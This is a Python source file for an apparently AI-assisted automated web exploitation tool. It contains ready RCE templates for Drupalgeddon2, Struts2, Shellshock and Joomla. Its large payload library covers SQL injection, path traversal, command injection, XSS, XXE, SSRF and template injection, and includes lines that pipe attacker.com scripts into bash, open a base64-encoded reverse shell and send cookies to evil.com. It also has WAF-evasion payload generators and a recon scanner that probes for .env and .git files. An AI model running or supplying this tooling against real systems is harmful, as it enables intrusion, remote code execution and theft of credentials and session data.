| import asyncio |
| import httpx |
| import ssl |
| import csv |
| import time |
| import json |
| import base64 |
| import hashlib |
| import re |
| import urllib.parse |
| import pandas as pd |
| import gradio as gr |
| from collections import defaultdict |
| from typing import Dict, List, Tuple, Any, Optional |
| from pydantic import BaseModel, Field |
| from datetime import datetime |
| import traceback |
|
|
| try: |
| from google import genai |
| from google.genai import types |
| GEMINI_AVAILABLE = True |
| except ImportError: |
| GEMINI_AVAILABLE = False |
|
|
| |
| |
| |
|
|
| MAX_CONCURRENT_RECON = 30 |
| SCAN_TIMEOUT = 8.0 |
| EXPLOIT_TIMEOUT = 15.0 |
| MAX_FIX_ITERATIONS = 3 |
|
|
| HTTP_HEADERS = { |
| "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", |
| "Accept": "text/html,application/json,*/*", |
| "Accept-Language": "en-US,en;q=0.9", |
| "Accept-Encoding": "gzip, deflate", |
| "Connection": "keep-alive", |
| } |
|
|
| |
| |
| |
|
|
| METASPLOIT_TEMPLATES = { |
| "drupal_drupalgeddon2": { |
| "name": "Drupal Drupalgeddon 2 RCE", |
| "description": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - RCE via form rendering", |
| "cve": "CVE-2018-7600", |
| "target_paths": ["/user/register", "/?q=user/register", "/user/password"], |
| "method": "POST", |
| "payload_template": { |
| "form_id": "user_register_form", |
| "mail[#post_render][]": "exec", |
| "mail[#type]": "markup", |
| "mail[#markup]": "{COMMAND}" |
| } |
| }, |
| "joomla_http_header_rce": { |
| "name": "Joomla 3.0.0-3.4.6 RCE", |
| "description": "Joomla HTTP Header Unauthenticated Remote Code Execution", |
| "cve": "CVE-2015-8562", |
| "target_paths": ["/"], |
| "method": "GET", |
| "headers": { |
| "User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'" |
| } |
| }, |
| "wordpress_xmlrpc_pingback": { |
| "name": "WordPress XML-RPC Pingback", |
| "description": "WordPress XML-RPC SSRF/Port Scanner", |
| "cve": "N/A", |
| "target_paths": ["/xmlrpc.php"], |
| "method": "POST", |
| "headers": {"Content-Type": "text/xml"}, |
| "payload_template": """<?xml version="1.0" encoding="UTF-8"?> |
| <methodCall> |
| <methodName>pingback.ping</methodName> |
| <params> |
| <param><value><string>{TARGET_URL}</string></value></param> |
| <param><value><string>{BLOG_URL}</string></value></param> |
| </params> |
| </methodCall>""" |
| }, |
| "struts2_content_type": { |
| "name": "Apache Struts2 Content-Type RCE", |
| "description": "Apache Struts 2.3.5 - 2.3.31 / 2.5 - 2.5.10 RCE", |
| "cve": "CVE-2017-5638", |
| "target_paths": ["/"], |
| "method": "POST", |
| "headers": { |
| "Content-Type": "%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" |
| } |
| }, |
| "shellshock": { |
| "name": "Shellshock (Bash Remote Code Execution)", |
| "description": "GNU Bash 4.3 and earlier Remote Code Execution", |
| "cve": "CVE-2014-6271", |
| "target_paths": ["/cgi-bin/status", "/cgi-bin/test.cgi", "/cgi-bin/admin.cgi"], |
| "method": "GET", |
| "headers": { |
| "User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'" |
| } |
| } |
| } |
|
|
| |
| |
| |
|
|
| PAYLOAD_LIBRARY = { |
| "SQLi": { |
| "Time-Based Blind": [ |
| "' OR SLEEP(5)--", |
| "' AND IF(1=1,SLEEP(5),0)--", |
| "'; WAITFOR DELAY '00:00:05'--", |
| "' OR pg_sleep(5)--", |
| "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--", |
| "' OR 1=1 AND SLEEP(5)--", |
| "\" OR SLEEP(5)--", |
| "1; SELECT SLEEP(5)--", |
| ], |
| "Union-Based": [ |
| "' UNION SELECT NULL,NULL,NULL--", |
| "' UNION SELECT 1,@@version,3--", |
| "' UNION SELECT table_name,NULL FROM information_schema.tables--", |
| "-1' UNION ALL SELECT NULL,concat(username,0x3a,password),NULL FROM users--", |
| "' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--", |
| "' UNION SELECT NULL,load_file('/etc/passwd'),NULL--", |
| ], |
| "Error-Based": [ |
| "' AND extractvalue(1,concat(0x7e,version()))--", |
| "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--", |
| "' OR 1=convert(int,(SELECT @@version))--", |
| "' AND updatexml(1,concat(0x7e,(SELECT database())),1)--", |
| "' AND exp(~(SELECT * FROM (SELECT user())a))--", |
| ], |
| "Boolean-Based": [ |
| "' AND '1'='1", |
| "' AND '1'='2", |
| "' AND SUBSTRING(@@version,1,1)='5'--", |
| "' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--", |
| "' AND (SELECT COUNT(*) FROM users)>0--", |
| "' OR EXISTS(SELECT * FROM users)--", |
| ], |
| "Stacked-Queries": [ |
| "'; INSERT INTO users VALUES('hacked','hacked')--", |
| "'; UPDATE users SET password='hacked' WHERE '1'='1'--", |
| "'; DROP TABLE users--", |
| "'; EXEC xp_cmdshell('whoami')--", |
| ], |
| "WAF-Bypass": [ |
| "' /*!OR*/ 1=1--", |
| "' OR/**/1=1--", |
| "' %4fR 1=1--", |
| "'/**/OR/**/1=1--", |
| "' oR sLeEp(5)--", |
| "' OR 0x31=0x31--", |
| ], |
| }, |
| "LFI": { |
| "Basic": [ |
| "../../../../etc/passwd", |
| "..\\..\\..\\..\\windows\\win.ini", |
| "....//....//....//etc/passwd", |
| "..%2f..%2f..%2fetc%2fpasswd", |
| "/etc/passwd", |
| "../../etc/shadow", |
| "../../etc/hosts", |
| ], |
| "Null-Byte": [ |
| "../../../../etc/passwd%00", |
| "../../../../etc/passwd%00.jpg", |
| "../../../../etc/passwd\x00", |
| "../../../../etc/passwd%00.php", |
| ], |
| "Encoding": [ |
| "....%252f....%252f....%252fetc%252fpasswd", |
| "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", |
| "..%c0%af..%c0%af..%c0%afetc%c0%afpasswd", |
| "%252e%252e%252f%252e%252e%252fetc%252fpasswd", |
| "..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd", |
| ], |
| "Filter-Bypass": [ |
| "/var/www/../../etc/passwd", |
| r"....\/....\/....\/etc/passwd", |
| "/etc/passwd/.", |
| "php://filter/convert.base64-encode/resource=/etc/passwd", |
| ], |
| "PHP-Wrappers": [ |
| "php://filter/convert.base64-encode/resource=index.php", |
| "php://filter/read=string.rot13/resource=config.php", |
| "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=", |
| "php://input", |
| "phar://./test.phar/test.txt", |
| "zip://shell.jpg%23payload.php", |
| "expect://id", |
| ], |
| "Log-Poisoning": [ |
| "/var/log/apache2/access.log", |
| "/var/log/nginx/access.log", |
| "/proc/self/environ", |
| "/proc/self/fd/0", |
| "/var/log/auth.log", |
| ], |
| }, |
| "RCE": { |
| "Command-Injection": [ |
| "; id", |
| "| whoami", |
| "`uname -a`", |
| "$(cat /etc/passwd)", |
| "; curl http://attacker.com/shell.sh | bash", |
| "&& id", |
| "|| id", |
| "; ls -la /", |
| "\n id", |
| "%0a id", |
| ], |
| "PHP-Exec": [ |
| "<?php system($_GET['cmd']); ?>", |
| "<?php passthru($_GET['c']); ?>", |
| "<?php echo shell_exec('id'); ?>", |
| "<?php echo `id`; ?>", |
| "<?php proc_open('id',array(),$pipes); ?>", |
| ], |
| "Encoded": [ |
| "; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash", |
| "; ${IFS}id", |
| "; cat</etc/passwd", |
| "; {id}", |
| "$(IFS=,;cmd=id;$cmd)", |
| ], |
| "Template-Injection": [ |
| "{{7*7}}", |
| "${7*7}", |
| "#{7*7}", |
| "<%= 7*7 %>", |
| "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}", |
| "${T(java.lang.Runtime).getRuntime().exec('id')}", |
| ], |
| }, |
| "XSS": { |
| "Reflected": [ |
| "<script>alert(document.domain)</script>", |
| "<img src=x onerror=alert(1)>", |
| "<svg/onload=alert(1)>", |
| "'-alert(1)-'", |
| "<body onload=alert(1)>", |
| "\"><script>alert(1)</script>", |
| "'><img src=x onerror=alert(1)>", |
| ], |
| "Stored": [ |
| "<script>fetch('https://evil.com/?c='+document.cookie)</script>", |
| "<img src=x onerror=\"this.src='https://evil.com/?c='+btoa(document.cookie)\">", |
| "<svg><animate onbegin=alert(1) attributeName=x dur=1s>", |
| ], |
| "DOM-Based": [ |
| "javascript:alert(1)", |
| "#<script>alert(1)</script>", |
| "#\"><img src=x onerror=alert(1)>", |
| ], |
| "Encoded": [ |
| "%3Cscript%3Ealert(1)%3C/script%3E", |
| "<script>alert(1)</script>", |
| "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e", |
| "\\u003cscript\\u003ealert(1)\\u003c/script\\u003e", |
| ], |
| "Filter-Bypass": [ |
| "<ScRiPt>alert(1)</sCrIpT>", |
| "<script src=//evil.com/x.js>", |
| "<iframe src=javascript:alert(1)>", |
| "<details open ontoggle=alert(1)>", |
| "<input autofocus onfocus=alert(1)>", |
| "<select onchange=alert(1)><option>1</option></select>", |
| ], |
| }, |
| "XXE": { |
| "Basic": [ |
| '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>', |
| '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><root>&xxe;</root>', |
| ], |
| "OOB": [ |
| '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]><root>test</root>', |
| '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>', |
| ], |
| }, |
| "SSRF": { |
| "Internal": [ |
| "http://127.0.0.1", |
| "http://localhost", |
| "http://169.254.169.254/latest/meta-data/", |
| "http://[::1]", |
| "http://0.0.0.0", |
| "http://0177.0.0.1", |
| "http://2130706433", |
| ], |
| "Cloud-Metadata": [ |
| "http://169.254.169.254/latest/meta-data/iam/security-credentials/", |
| "http://metadata.google.internal/computeMetadata/v1/", |
| "http://169.254.169.254/metadata/instance?api-version=2021-02-01", |
| ], |
| "Protocol-Bypass": [ |
| "file:///etc/passwd", |
| "dict://127.0.0.1:6379/info", |
| "gopher://127.0.0.1:9200/", |
| "sftp://attacker.com", |
| ], |
| }, |
| "NoSQLi": { |
| "MongoDB": [ |
| '{"username": {"$ne": null}, "password": {"$ne": null}}', |
| '{"username": {"$gt": ""}, "password": {"$gt": ""}}', |
| "' || '1'=='1", |
| "username[$ne]=invalid&password[$ne]=invalid", |
| '{"$where": "sleep(5000)"}', |
| ], |
| }, |
| "SSTI": { |
| "Detection": [ |
| "{{7*7}}", |
| "${7*7}", |
| "#{7*7}", |
| "<%= 7*7 %>", |
| "{{7*'7'}}", |
| ], |
| "Jinja2-RCE": [ |
| "{{''.__class__.__mro__[1].__subclasses__()}}", |
| "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}", |
| "{%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.__globals__['__builtins__'].eval(\"__import__('os').system('id')\") }}{%endif%}{%endfor%}", |
| ], |
| }, |
| } |
|
|
| |
| |
| |
|
|
| PAYLOAD_CODE_TEMPLATES = { |
| "SQLi_TimeBased": '''import urllib.parse |
| |
| def generate_sqli_time_payload(delay=5, db_type="mysql", encoding=None, waf_bypass=False): |
| """Generate time-based SQL injection payload with optional evasion.""" |
| base = { |
| "mysql": f"' OR SLEEP({delay})--", |
| "mssql": f"'; WAITFOR DELAY '00:00:0{delay}'--", |
| "postgres": f"' OR pg_sleep({delay})--", |
| "oracle": f"' OR 1=1 AND dbms_pipe.receive_message(('a'),{delay}) IS NULL--", |
| }.get(db_type, f"' OR SLEEP({delay})--") |
| |
| if waf_bypass: |
| # Inline comment evasion |
| base = base.replace(" ", "/**/") |
| |
| if encoding == "url": |
| return urllib.parse.quote(base) |
| elif encoding == "double_url": |
| return urllib.parse.quote(urllib.parse.quote(base)) |
| return base |
| |
| |
| # Usage |
| payload = generate_sqli_time_payload(delay=5, db_type="mysql", waf_bypass=True) |
| print(payload) |
| ''', |
| "SQLi_Union": '''def generate_sqli_union(cols=3, target_col=2, target_expr="@@version", db_type="mysql"): |
| """Generate UNION-based SQL injection for data extraction.""" |
| nulls = ",".join( |
| target_expr if i == target_col else "NULL" |
| for i in range(1, cols + 1) |
| ) |
| payload = f"' UNION SELECT {nulls}--" |
| |
| if db_type == "postgres": |
| payload = f"' UNION SELECT {nulls}--" |
| elif db_type == "mssql": |
| payload = f"' UNION SELECT {nulls}--" |
| |
| return payload |
| |
| |
| # Enumerate tables (MySQL) |
| print(generate_sqli_union(cols=3, target_col=2, |
| target_expr="group_concat(table_name)", db_type="mysql")) |
| # Get version |
| print(generate_sqli_union(cols=3, target_col=2, target_expr="@@version")) |
| ''', |
| "LFI_Basic": '''import urllib.parse |
| |
| def generate_lfi_payload(depth=4, target="etc/passwd", os_type="linux", |
| encoding=None, null_byte=False): |
| """Generate LFI path traversal payload with encoding options.""" |
| if os_type == "linux": |
| traversal = "../" * depth |
| raw = f"{traversal}{target}" |
| else: |
| traversal = "..\\\\" * depth |
| raw = f"{traversal}windows\\\\win.ini" |
| |
| if null_byte: |
| raw += "%00" |
| |
| if encoding == "url": |
| return urllib.parse.quote(raw, safe="") |
| elif encoding == "double_url": |
| return urllib.parse.quote(urllib.parse.quote(raw, safe=""), safe="") |
| elif encoding == "unicode": |
| return raw.replace("/", "%c0%af").replace(".", "%c0%ae") |
| elif encoding == "overlong": |
| return raw.replace("/", "%2f").replace(".", "%2e") |
| return raw |
| |
| |
| # Basic |
| print(generate_lfi_payload(depth=5, target="etc/passwd")) |
| # Null-byte bypass |
| print(generate_lfi_payload(depth=5, target="etc/passwd", null_byte=True)) |
| # Double-URL encoded |
| print(generate_lfi_payload(depth=5, target="etc/passwd", encoding="double_url")) |
| ''', |
| "LFI_PHP_Wrappers": '''def php_filter_payload(resource="index.php", encode="base64"): |
| """Generate PHP wrapper LFI payloads.""" |
| payloads = { |
| "base64": f"php://filter/convert.base64-encode/resource={resource}", |
| "rot13": f"php://filter/read=string.rot13/resource={resource}", |
| "zlib": f"php://filter/zlib.deflate/convert.base64-encode/resource={resource}", |
| "stdin": "php://input", |
| "data": "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=", |
| "expect": "expect://id", |
| "phar": "phar://./uploaded.phar/shell.php", |
| } |
| return payloads.get(encode, payloads["base64"]) |
| |
| |
| def decode_base64_lfi(b64_string): |
| """Decode base64-encoded file content from LFI response.""" |
| import base64 |
| try: |
| return base64.b64decode(b64_string).decode("utf-8", errors="replace") |
| except Exception as e: |
| return f"Decode error: {e}" |
| |
| |
| # Get source code of config file |
| print(php_filter_payload("config.php", "base64")) |
| # RCE via data wrapper |
| print(php_filter_payload(encode="data")) |
| ''', |
| "RCE_CommandInjection": '''import urllib.parse |
| |
| def generate_rce_payload(command="id", separator=";", encoding=None, bypass_spaces=False): |
| """Generate OS command injection payload with evasion.""" |
| if bypass_spaces: |
| command = command.replace(" ", "${IFS}") |
| |
| separators = { |
| "semicolon": f"; {command}", |
| "pipe": f"| {command}", |
| "background": f"& {command}", |
| "or": f"|| {command}", |
| "and": f"&& {command}", |
| "newline": f"%0a{command}", |
| "backtick": f"`{command}`", |
| "subshell": f"$({command})", |
| } |
| raw = separators.get(separator, f"; {command}") |
| |
| if encoding == "url": |
| return urllib.parse.quote(raw, safe="") |
| elif encoding == "double_url": |
| return urllib.parse.quote(urllib.parse.quote(raw, safe=""), safe="") |
| return raw |
| |
| |
| # Basic RCE |
| print(generate_rce_payload("whoami", "semicolon")) |
| # Space-bypass |
| print(generate_rce_payload("cat /etc/passwd", "subshell", bypass_spaces=True)) |
| # URL-encoded newline injection |
| print(generate_rce_payload("id", "newline", encoding="url")) |
| ''', |
| "XSS_Basic": '''def generate_xss_payload(context="html", bypass=False, exfil_url=None): |
| """ |
| Generate context-aware XSS payload. |
| context: html | attr | js | url |
| """ |
| base_payloads = { |
| "html": "<script>alert(document.domain)</script>", |
| "attr": "\" onmouseover=\"alert(1)", |
| "js": "';alert(1)//", |
| "url": "javascript:alert(1)", |
| "svg": "<svg/onload=alert(1)>", |
| "img": "<img src=x onerror=alert(1)>", |
| } |
| payload = base_payloads.get(context, base_payloads["html"]) |
| |
| if exfil_url: |
| payload = f"<script>fetch('{exfil_url}?c='+encodeURIComponent(document.cookie))</script>" |
| |
| if bypass: |
| payload = payload.replace("<script", "<ScRiPt").replace("</script", "</sCrIpT") |
| |
| return payload |
| |
| |
| # Basic reflected XSS |
| print(generate_xss_payload("html")) |
| # Attribute context |
| print(generate_xss_payload("attr")) |
| # Cookie stealer |
| print(generate_xss_payload(exfil_url="https://evil.com/log")) |
| # Case-bypass |
| print(generate_xss_payload("html", bypass=True)) |
| ''', |
| "SSTI_Detection": '''def generate_ssti_probes(): |
| """Generate SSTI detection probes for multiple template engines.""" |
| probes = { |
| "Jinja2/Twig": "{{7*7}}", # expect: 49 |
| "FreeMarker": "${7*7}", # expect: 49 |
| "Velocity": "#set($x=7*7)$x", # expect: 49 |
| "Smarty": "{7*7}", # expect: 49 |
| "ERB (Ruby)": "<%= 7*7 %>", # expect: 49 |
| "Pebble": "{{7*'7'}}", # Jinja2: 49, Twig: 7777777 |
| "Mako": "${7*7}", |
| } |
| return probes |
| |
| |
| def generate_jinja2_rce(command="id"): |
| """Generate Jinja2 RCE payload.""" |
| return ( |
| "{%for c in [].__class__.__base__.__subclasses__()%}" |
| "{%if c.__name__=='catch_warnings'%}" |
| "{{c.__init__.__globals__['__builtins__']" |
| f".eval(\"__import__('os').popen('{command}').read()\")" |
| "}}{%endif%}{%endfor%}" |
| ) |
| |
| |
| for engine, probe in generate_ssti_probes().items(): |
| print(f"{engine}: {probe}") |
| |
| print("\\nRCE:", generate_jinja2_rce("id")) |
| ''', |
| "Custom": '''import urllib.parse, base64, re |
| |
| def generate_custom_payload(base_payload, encoding=None, evasion=None, prefix="", suffix=""): |
| """ |
| Flexible payload generator. |
| |
| Args: |
| base_payload : The base attack string |
| encoding : url | double_url | base64 | html_entity | unicode_escape |
| evasion : case_variation | comment_insertion | whitespace_abuse | null_bytes |
| prefix/suffix: Wrap the final payload |
| """ |
| result = base_payload |
| |
| # Evasion transforms (applied before encoding) |
| if evasion == "case_variation": |
| result = "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(result)) |
| elif evasion == "comment_insertion": |
| result = result.replace(" ", "/**/") |
| elif evasion == "whitespace_abuse": |
| result = result.replace(" ", "%09") # tab |
| elif evasion == "null_bytes": |
| result = result.replace(" ", "%00 ") |
| |
| # Encoding layer |
| if encoding == "url": |
| result = urllib.parse.quote(result, safe="") |
| elif encoding == "double_url": |
| result = urllib.parse.quote(urllib.parse.quote(result, safe=""), safe="") |
| elif encoding == "base64": |
| result = base64.b64encode(result.encode()).decode() |
| elif encoding == "html_entity": |
| result = "".join(f"&#{ord(c)};" for c in result) |
| elif encoding == "unicode_escape": |
| result = result.encode("unicode_escape").decode() |
| |
| return f"{prefix}{result}{suffix}" |
| |
| |
| # Example: SQLi with comment-insertion WAF bypass |
| print(generate_custom_payload("' OR 1=1--", evasion="comment_insertion")) |
| # URL-encoded XSS |
| print(generate_custom_payload("<script>alert(1)</script>", encoding="url")) |
| # Double-URL LFI |
| print(generate_custom_payload("../../../../etc/passwd", encoding="double_url")) |
| ''' |
| } |
|
|
| |
| |
| |
|
|
| class VulnerabilityAnalysis(BaseModel): |
| vulnerability_type: str = Field(description="Primary vulnerability class (SQLi, LFI, RCE, XSS, SSTI, NoSQLi, etc.)") |
| confidence: str = Field(description="Confidence level: High, Medium, Low") |
| attack_vector: str = Field(description="Specific attack approach") |
| target_parameters: List[str] = Field(description="Vulnerable parameters or paths") |
| reasoning: str = Field(description="Technical reasoning for this assessment") |
| secondary_vulns: List[str] = Field(default=[], description="Other potential vulnerabilities to probe") |
| related_cves: List[str] = Field(default=[], description="Known CVEs that might apply") |
|
|
| class AttackStrategy(BaseModel): |
| vulnerability_class: str = Field(description="Class of vulnerability") |
| target_endpoint: str = Field(description="Specific endpoint and parameter") |
| strategy: str = Field(description="Attack methodology") |
| evasion_techniques: List[str] = Field(description="WAF/IDS evasion methods to apply") |
| expected_indicators: List[str] = Field(description="Success indicators to look for") |
| http_method: str = Field(default="GET", description="HTTP method to use: GET, POST, PUT") |
| content_type: str = Field(default="", description="Content-Type header if POST/PUT needed") |
| request_body_template: str = Field(default="", description="Body template for POST requests, use {PAYLOAD} placeholder") |
| metasploit_template: str = Field(default="", description="Metasploit template to use if applicable") |
|
|
| class PayloadGeneration(BaseModel): |
| payload: str = Field(description="The exact payload string") |
| code_template: str = Field(description="Python code to generate this payload") |
| encoding: str = Field(description="Encoding applied (none, url, double-url, base64, etc.)") |
| reasoning: str = Field(description="Why this payload is effective") |
| alternative_payloads: List[str] = Field(description="Backup payloads if primary fails") |
| http_method: str = Field(default="GET", description="HTTP method") |
| inject_in_body: bool = Field(default=False, description="True if payload goes in body, not URL") |
| content_type: str = Field(default="", description="Content-Type for body injection") |
|
|
| class ExploitAnalysis(BaseModel): |
| success: bool = Field(description="Whether exploit succeeded") |
| evidence: List[str] = Field(description="Evidence of successful exploitation") |
| next_steps: List[str] = Field(description="Recommended next actions") |
| data_extracted: str = Field(description="Any sensitive data found") |
| vuln_confirmed: str = Field(default="", description="Confirmed vulnerability type") |
| fix_suggestions: List[str] = Field(default=[], description="Suggestions to fix/improve the payload if it failed") |
|
|
| class CentaurChatResponse(BaseModel): |
| chat_reply: str = Field(description="Natural language response to operator") |
| suggested_endpoint: str = Field(description="Updated target endpoint") |
| suggested_payload: str = Field(description="Patched/generated payload") |
| suggested_code: str = Field(description="Python code to generate the payload") |
| technical_analysis: str = Field(description="Technical explanation of changes") |
| http_method: str = Field(default="GET", description="HTTP method to use") |
|
|
| class PayloadPatchResponse(BaseModel): |
| updated_code: str = Field(description="The patched Python code") |
| changes_made: List[str] = Field(description="List of specific changes applied") |
| explanation: str = Field(description="Explanation of why these changes help") |
|
|
| |
| |
| |
|
|
| class ExploitLogger: |
| def __init__(self): |
| self.logs = [] |
|
|
| def log(self, level: str, message: str, context: dict = None): |
| entry = { |
| "timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3], |
| "level": level, |
| "message": message, |
| "context": context or {} |
| } |
| self.logs.append(entry) |
| return entry |
|
|
| def get_logs(self, level=None): |
| if level: |
| return [log for log in self.logs if log["level"] == level] |
| return self.logs |
|
|
| def format_logs(self): |
| formatted = [] |
| for log in self.logs: |
| ctx = f" | {log['context']}" if log['context'] else "" |
| formatted.append(f"[{log['timestamp']}] {log['level']}: {log['message']}{ctx}") |
| return "\n".join(formatted) |
|
|
| def clear(self): |
| self.logs = [] |
|
|
| exploit_logger = ExploitLogger() |
|
|
| |
| |
| |
|
|
| class ReconProfile: |
| def __init__(self, host: str, port: int): |
| self.target_id = f"{host}:{port}" |
| self.host = host |
| self.port = port |
| self.protocol = "http" |
| self.is_alive = False |
| self.server_banner = "Unknown" |
| self.waf_detected = "None" |
| self.discovered_paths = [] |
| self.error_signatures = [] |
| self.technologies = [] |
| self.cookies = {} |
| self.forms_found = [] |
| self.api_endpoints = [] |
| self.response_time_baseline = 0.0 |
| self.redirect_chain = [] |
| self.injectable_params = [] |
| self.cms_detected = "" |
|
|
| @property |
| def is_exploitable(self): |
| return self.is_alive and ( |
| len(self.discovered_paths) > 0 or |
| len(self.error_signatures) > 0 or |
| len(self.forms_found) > 0 or |
| len(self.api_endpoints) > 0 or |
| self.server_banner != "Unknown" |
| ) |
|
|
| def to_dict(self): |
| return { |
| "target_id": self.target_id, |
| "protocol": self.protocol, |
| "server": self.server_banner, |
| "waf": self.waf_detected, |
| "cms": self.cms_detected, |
| "paths": len(self.discovered_paths), |
| "errors": len(self.error_signatures), |
| "forms": len(self.forms_found), |
| "apis": len(self.api_endpoints), |
| "tech": ", ".join(self.technologies[:3]), |
| } |
|
|
|
|
| class AdvancedReconEngine: |
| def __init__(self, profile: ReconProfile): |
| self.p = profile |
| self.client = httpx.AsyncClient( |
| verify=False, |
| timeout=SCAN_TIMEOUT, |
| headers=HTTP_HEADERS, |
| follow_redirects=True, |
| max_redirects=3 |
| ) |
|
|
| async def _detect_protocol(self): |
| try: |
| conf = ssl.create_default_context() |
| conf.check_hostname = False |
| conf.verify_mode = ssl.CERT_NONE |
| reader, writer = await asyncio.wait_for( |
| asyncio.open_connection(self.p.host, self.p.port, ssl=conf), |
| timeout=2.0 |
| ) |
| writer.close() |
| await writer.wait_closed() |
| self.p.protocol = "https" |
| except Exception: |
| self.p.protocol = "http" |
|
|
| def _url(self, path=""): |
| return f"{self.p.protocol}://{self.p.host}:{self.p.port}{path}" |
|
|
| async def _fingerprint_tech(self, response): |
| headers = response.headers |
| body = response.text.lower() |
|
|
| if "x-powered-by" in headers: |
| self.p.technologies.append(f"Powered-By: {headers['x-powered-by']}") |
|
|
| if "laravel" in body or "laravel_session" in str(response.cookies): |
| self.p.technologies.append("Laravel") |
| if "wordpress" in body or "wp-content" in body: |
| self.p.technologies.append("WordPress") |
| self.p.cms_detected = "WordPress" |
| if "django" in body or "csrftoken" in str(response.cookies): |
| self.p.technologies.append("Django") |
| if "express" in headers.get("x-powered-by", "").lower(): |
| self.p.technologies.append("Express.js") |
| if "flask" in body or "werkzeug" in headers.get("server", "").lower(): |
| self.p.technologies.append("Flask") |
| if "joomla" in body: |
| self.p.technologies.append("Joomla") |
| self.p.cms_detected = "Joomla" |
| if "drupal" in body: |
| self.p.technologies.append("Drupal") |
| self.p.cms_detected = "Drupal" |
| if "struts" in body or "struts" in headers.get("x-powered-by", "").lower(): |
| self.p.technologies.append("Apache Struts") |
|
|
| waf_indicators = { |
| "cloudflare": ["cf-ray", "__cfduid"], |
| "akamai": ["akamai", "ak_bmsc"], |
| "aws-waf": ["x-amzn-trace-id", "x-amz-"], |
| "imperva": ["x-iinfo", "incap_ses"], |
| "f5": ["x-wa-info", "f5"], |
| "fortiweb": ["fortigate", "fortiweb"], |
| "modsecurity": ["mod_security", "modsec"], |
| } |
| for waf_name, indicators in waf_indicators.items(): |
| if any(ind in str(headers).lower() for ind in indicators): |
| self.p.waf_detected = waf_name.upper() |
| break |
|
|
| async def _scan_paths(self): |
| paths = [ |
| "/admin", "/administrator", "/admin.php", "/wp-admin", "/phpmyadmin", |
| "/cpanel", "/controlpanel", "/dashboard", |
| "/.env", "/.git/config", "/config.php", "/wp-config.php", |
| "/web.config", "/.htaccess", "/robots.txt", "/sitemap.xml", |
| "/api", "/api/v1", "/api/v2", "/graphql", "/rest", |
| "/api/users", "/api/admin", "/api/config", |
| "/upload", "/uploads", "/files", "/download", |
| "/search", "/login", "/logout", "/register", |
| "/?id=1", "/?user=admin", "/?file=index", |
| "/search?q=test", "/api/users?id=1", |
| "/index.php?page=home", "/?page=about", |
| "/xmlrpc.php", "/cgi-bin/status", |
| ] |
|
|
| tasks = [self.client.get(self._url(p)) for p in paths] |
| results = await asyncio.gather(*tasks, return_exceptions=True) |
|
|
| for path, res in zip(paths, results): |
| if isinstance(res, Exception): |
| continue |
|
|
| if hasattr(res, 'history') and res.history: |
| self.p.redirect_chain.append(f"{path} -> {res.url}") |
|
|
| if res.status_code in [200, 401, 403, 405]: |
| if "?" not in path: |
| self.p.discovered_paths.append(path) |
| else: |
| self.p.api_endpoints.append(path) |
| params = re.findall(r'\?([^=]+)=|&([^=]+)=', path) |
| for p_match in params: |
| param = p_match[0] or p_match[1] |
| if param and param not in self.p.injectable_params: |
| self.p.injectable_params.append(param) |
|
|
| if "<form" in res.text.lower(): |
| self.p.forms_found.append(path) |
| actions = re.findall(r'action=["\']([^"\']+)["\']', res.text, re.IGNORECASE) |
| inputs = re.findall(r'name=["\']([^"\']+)["\']', res.text, re.IGNORECASE) |
| for a in actions[:2]: |
| if a not in self.p.injectable_params: |
| self.p.injectable_params.append(f"form:{a}") |
|
|
| error_patterns = [ |
| "sql syntax", "mysql", "postgresql", "mssql", "oracle error", |
| "syntax error", "database error", "query failed", |
| "stack trace", "traceback", "exception", |
| "warning:", "fatal error", "parse error", |
| "undefined index", "undefined variable", |
| "mysql_fetch", "pg_query", "sqlite", |
| "odbc", "jdbc", "ado.net", |
| ] |
| body_lower = res.text.lower() |
| for pattern in error_patterns: |
| if pattern in body_lower: |
| self.p.error_signatures.append(f"{pattern.upper()} on {path}") |
| break |
|
|
